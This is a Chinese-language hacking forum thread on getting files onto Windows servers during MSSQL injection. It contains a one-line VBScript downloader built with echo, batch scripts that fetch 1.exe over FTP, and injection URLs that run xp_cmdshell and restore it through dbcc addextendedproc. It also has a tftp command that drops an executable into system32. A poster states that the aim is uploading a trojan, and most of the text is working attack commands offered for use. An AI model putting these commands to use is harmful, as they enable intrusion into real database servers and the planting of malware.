信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

文/superhei
解决办法:
1.iget.vbs一次写入
在vbs语句的接触是符号是: 所以我们iget.vbs可以这样写

Set x= CreateObject("Microsoft.XMLHTTP"):x.Open "GET",LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject("ADODB.Stream"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2

这样我们可以一次echo成功,echo版本:

echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >iget.vbs


2.bat调用ftp脚本的写法(by envymask)

echo ftp>1.vbs
echo open ip>2.vbs
echo u>3.vbs
echo s>4.vbs
echo binary>5.vbs
echo get 1.exe>6.vbs
echo bay>7.vbs

copy 1.vbs+2.vbs+3.vbs+4.vbs+5.vbs+6.vbs+7.vbs new.vbs

3.解决方法by xiaolu

http://xxx.com/x.asp?id=1;Exec Master..xp_cmdshell 'echo xxxx1 > xxx.vbs';exec master..sp_dropextendedproc 'xp_cmdshell'--
http://xxx.com/x.asp?id=1;use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')--
http://xxx.com/x.asp?id=1;Exec Master..xp_cmdshell 'echo xxxx2 >> xxx.vbs';exec master..sp_dropextendedproc 'xp_cmdshell'--
http://xxx.com/x.asp?id=1;use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')--
.
.
.

补充两个上传文件的方法:
ftp批理上传文件:(感觉方法2有点麻烦了,不如这个简单)

echo open 192.168.1.190 >1.bat
echo pt007>>1.bat
echo 123>>1.bat
echo binary>>1.bat
echo get 1.exe c:\1.exe>>1.bat
echo bye>>1.bat

然后ftp –s:c:\1.bat

tftp命令上传文件:
tftp -i 210.73.XX.XX get pslist.exe c:\winnt\system32\list.exe

引用:

这里是引用第[1 楼]的pt007于2006-03-23 13:13发表的：
补充两个上传文件的方法:
ftp批理上传文件:(感觉方法2有点麻烦了,不如这个简单)

echo open 192.168.1.190 >1.bat
echo pt007>>1.bat
.......

大哥 你对标题还不太理解把

兄弟,我这个也是多次echo后上传文件的方法.不管怎么做,能上传木马解决问题就行

引用:

这里是引用第[3 楼]的pt007于2006-03-25 14:02发表的：
兄弟,我这个也是多次echo后上传文件的方法.不管怎么做,能上传木马解决问题就行

mssql注射中多次调用参数导致多次echo的解决方法

多次ECHO一般来说，好象是因为多次查询数据库造成的`
一般我看到几个连接文件的话，就会执行多少次SQL的语句
所以PT007你的方法是根本不能成功的